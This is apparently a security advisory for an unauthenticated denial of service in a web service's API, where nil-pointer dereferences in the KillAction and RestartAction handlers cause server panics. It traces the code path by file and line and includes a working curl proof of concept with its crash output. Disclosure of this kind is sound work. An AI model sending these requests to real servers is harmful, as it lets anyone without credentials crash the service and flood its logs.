An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via StartActionByGet (invalid action ID), then calling KillAction or RestartAction on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (Empty reply from server), enabling denial of service through panic/log/CPU amplification.
The issue is caused by this flow:
StartActionByGet accepts arbitrary actionId and still calls executor:
service/internal/api/api.go:239Executor stores a log entry before binding validation:
service/internal/executor/executor.go:519If binding is nil, execution stops, but the log entry remains:
service/internal/executor/executor.go:781KillAction dereferences execReqLogEntry.Binding.Action without checking Binding:
service/internal/api/api.go:79RestartAction has the same unsafe dereference:
service/internal/api/api.go:1285Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.
Environment:
http://localhost:1337main (commit 235493e) and tag 3000.11.0T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
-H 'Content-Type: application/json' \
--data '{"actionId":"does-not-exist"}' \
| sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"
2. Trigger panic in RestartAction:
curl -v -X POST http://localhost:1337/api/RestartAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
3. Trigger panic in KillAction:
curl -v -X POST http://localhost:1337/api/KillAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
Observed client output:
- curl: (52) Empty reply from server
Observed server log:
- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
- service/internal/api/api.go:79 (KillAction)
- service/internal/api/api.go:1285 (RestartAction)
This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.
{
"cwe_ids": [
"CWE-20",
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T20:54:25Z",
"nvd_published_at": null,
"severity": "MODERATE"
}